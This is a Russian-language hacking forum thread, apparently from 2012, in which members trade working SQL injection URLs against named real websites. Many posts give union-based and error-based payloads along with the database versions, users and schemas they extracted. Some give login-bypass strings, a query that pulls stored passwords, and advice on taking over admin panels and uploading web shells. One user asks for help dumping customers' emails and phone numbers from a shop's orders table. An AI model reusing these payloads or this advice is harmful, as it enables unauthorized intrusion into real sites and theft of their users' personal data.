SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. lexus5122

    lexus5122 New Member

    Joined:
    16 Mar 2007
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    Нашел уязвимость через havij: http://www.kinovdom.ru/item.php?id=18537

    bd: u0021_kinovdom
    таблица: orders
    колонки: name
    email
    phone

    Проблема в том, что в этой огромной бд, достается этим havij 99% всех данных, но конкретно данная таблица, не достается, пишет следующее:


    Count(*) of u0021_kinovdom.orders is 0
    Can not get rows count, trying to get 10 rows
    Turning off 'bypass illegal union' and retrying!
    Data Found: name=
    Turning on 'bypass illegal union' and retrying!
    Data Found: email=
    Turning off 'bypass illegal union' and retrying!
    Data Found: phone=
    Turning on 'bypass illegal union' and retrying!

    и так далее... Помогите пожалуйста достать эти данные!
     
  2. lex1094

    lex1094 New Member

    Joined:
    26 Jul 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Ищи админку на сайте, потом войти как админ (данные админа вытащи из таблицы logins)
    Затем ищи phpMyAdmin, ну а там я думаю догадаешься что нужно делать :)
     
  3. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    525
    Reputations:
    173
    lex1094

    Нормально нужно выкладывать, а не это

    lexus5122

    Правильно пишет, потому что там пусто







    И главное, для подобных вопросов, тут есть отдельная тема, там и спрашивайте


     
  4. lexus5122

    lexus5122 New Member

    Joined:
    16 Mar 2007
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    Логинс, вытащил, а админка не ищется кроме как: http://www.kinovdom.ru:2082/ соответственно по этому пассу не входит ) Мне главное слить даже если без имен и телефонов, хоть емейлы

    а как же там может быть пусто... должны же где то храниться заказы\емейлы заказчиков...
     
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    525
    Reputations:
    173
    Я показал тему для таких вопросов?
    и ещё раз
     
  6. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    525
    Reputations:
    173
    Партия "Яблоко"

    Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
     
  7. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    525
    Reputations:
    173
    4 символа
     
  8. ^NSA^

    ^NSA^ Elder - Старейшина

    Joined:
    3 Jul 2012
    Messages:
    66
    Likes Received:
    29
    Reputations:
    32
    Бинокли

     
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    Host = www.rae.ru

    Российская Академия Естесствознания

    PR = 5
    TYC = 1500


    Inject
    Code:
    _ttp://www.rae.ru/fs/?section=content&op=show_article&article_id=7789203+and+1=2+union+select+1,2,3,4,5,null,7,null,9,10,11,12,null,null,null,16,17,18,19,20,21,22,23,24,25,26,null,28,29,null,31,version(),33
    Info

    VERSION = 5.5.24-log
    USER = sup78user@localhost
    DATABASE = fs

    BASES:
    Code:
    information_schema
    account
    apsc
    atmail
    club
    demo
    econf
    es1
    express
    famd
    famous
    forum
    forum10
    forum11
    forum12
    fs
    horde
    med
    monogra
    mysql
    online
    performance_schema
    phpmyadmin_gAAfZmC2ngnA
    psa
    rae
    research
    rus-sci
    science
    se
    shop
    sitebuilder5
    social
    vak
    who
    Во все БД есть доступы и они от этих сайтов

    1) www.rae.ru PR=5 TYC=1500
    2) 15.rae.ru PR=4 TYC=0
    3) express.rae.ru PR=3 TYC=0
    4) gerb.rae.ru PR=4 TYC=0
    5) online.rae.ru PR=3 TYC=20
    6) russian-scientists.ru PR=4 TYC=30
    7) science-education.ru PR=5 TYC=180
    8) www.es.rae.ru PR=4 TYC=20
    9) www.famous-scientists.ru PR=5 TYC=1400
    10) www.monographies.ru PR=4 TYC=30
    11) www.russian-scientists.ru PR=4 TYC=30



    ByPass authentication SQL-Injection:

    1) _ttp://online.rae.ru/login/auth/

    Login = ' or 1='1
    Password = ' or 1='1

    2) _ttp://www.famous-scientists.ru/login/auth/

    Login = admin' or 1='1
    Pass = admin' or 1='1


    Ну и последняя плюшка...

    Админка от 1C Bitrix. Вдруг пасс расшифруете, я не смог =(

    _ttp://russian-scientists.ru:8888/bitrix/admin/


    З.Ы. Если зальёте шелл - напомните мне в ПМ, что я неудачник =)
     
    _________________________
    #15089 BigBear, 4 Aug 2012
    Last edited: 4 Aug 2012
    3 people like this.
  10. ^NSA^

    ^NSA^ Elder - Старейшина

    Joined:
    3 Jul 2012
    Messages:
    66
    Likes Received:
    29
    Reputations:
    32
    saveoursound
    Корова
    Code:
    http://www.korova.ru/humor/viewer.php?id=-32 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8 --
     
    #15090 ^NSA^, 4 Aug 2012
    Last edited: 4 Aug 2012
  11. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    27
    Likes Received:
    28
    Reputations:
    8
    MySQL: GET SQLi in param 'id' in URL:http://orgasmof.ru
    Code:
    http://orgasmof.ru/?id=1%27%20AND%20%28SELECT%203101%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6473763a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28user%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a6d68743a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27YQPM%27=%27YQPM
    user(): orgasm@localhost
    version(): 5.1.49-3
     
    1 person likes this.
  12. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Философский портал.

    Code:
    http://arcto.ru/modules.php?name=News&file=print&sid=1-1.1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),2,3,4,5,6--
    Database Version: 5.1.63
    Database name: arctogaia
    User name: arctogaia@web.evrazia.org

    ТИЦ: 325
    PR: 5
     
    1 person likes this.
  13. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    911
    Likes Received:
    469
    Reputations:
    723
    Что-то тихо тут...
    PR=6
    CY=30
     
    _________________________
    2 people like this.
  14. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Товары почтой.

    Code:
    http://zacaz.com/products.php?news_id=1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--
    Вывод в meta.

    Database Version: 5.1.63-log
    Database name: torgpost_db
    User name: torgpost_db@91.206.200.70

    ТИЦ: 30
    PR: 3


    Блого-хостинг.

    Code:
    http://www.yesblog.ru/blog.php?user=onlinepburriigri&note=1-1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8,9-- 
    Вывод в title.

    Database Version: 5.0.92
    Database name: blogsua_yesblog
    User name: blogsua_yesblog@localhost

    ТИЦ: 40
    PR: 2
     
    #15094 HellFire, 7 Aug 2012
    Last edited: 7 Aug 2012
    1 person likes this.
  15. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    525
    Reputations:
    173
    http://www._photoline.ru/

    6-7 К трафа

    пробелы убрать
     
    3 people like this.
  16. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    911
    Likes Received:
    469
    Reputations:
    723
    Ранее я уже публиковал скулю на private, однако админы это дело отремонтировали, но на место старой приходит две новые...
     
    _________________________
    2 people like this.
  17. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Газета о жилом и коммерческом фонде.

    Code:
    http://www.konserg.ru/index.php?category_id=1+UNION+SELECT+1,2,3,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),5,6,7,8,9,10,11,12,13,14,15,16,17--
    information_schema не вывести т.к. хостер - sweb.ru фильтрует запросы и редиректит на sweb.ru/insecure :(

    Database Version: 5.1.58-log
    Database name: konsergru_kon
    User name: konsergru_kon@localhost

    ТИЦ: 180
    PR: 4
     
    1 person likes this.
  18. \/IRUS

    \/IRUS Elder - Старейшина

    Joined:
    3 Aug 2012
    Messages:
    379
    Likes Received:
    496
    Reputations:
    37
    ТМ FreeMarket.ua
    FreeMarket.ua - цены на компьютеры, мобильные телефоны, бытовую технику, недвижимость, автомобили и многое другое.

    Яндекс тИЦ (CY): 2500
    Google PageRank (PR): 6
    Alexa Rank: 48,503


    MySQL, Error-Based Duplicate entry SQLi

    Code:
    http://freemarket.ua/today.xml?page=1'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/passwd/**/from/**/t_user/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
    5.0.92-log
    freesell_new@193.33.212.14
    +
    раскрытие путей:

    Code:
    /var/www/freesell/data/www/freemarket.kiev.ua/inc/freemarket.inc.php
    шелл не лил :)
     
    #15098 \/IRUS, 7 Aug 2012
    Last edited: 7 Aug 2012
    2 people like this.
  19. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    134
    Likes Received:
    41
    Reputations:
    26
    на будущее
    пробелы ток убери.
     
    1 person likes this.
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    С болью на сердце и злобой на сисадминов выкладываю эти скули. Работал в сотрудничащей фирме, позвонил им в 2010 году и сообщил про уязвимости в движке, буквально ткнул носом.

    Сказали, да-да, всё исправим...

    Two years later... А воз и ныне там...

    Сайт web-gorod.net

    Code:
    _ttp://web-gorod.net/index.php?id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x
    5.5.3-55
    DB = pzdobnin_wg
    Таблица с админами = userlist


    Сайт web-gorod-brn.ru

    Code:
    _ttp://web-gorod-brn.ru/view_post.php?cat=16&id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x
    5.1.50-lk-log
    DB = webgorodru
    Таблица с админами = userlist


    На главном сайте ещё куча всяких городов... Разбирайте.

    Пассы в plain-text
     
    _________________________
    #15100 BigBear, 8 Aug 2012
    Last edited: 8 Aug 2012
    2 people like this.
Loading...
Thread Status:
Not open for further replies.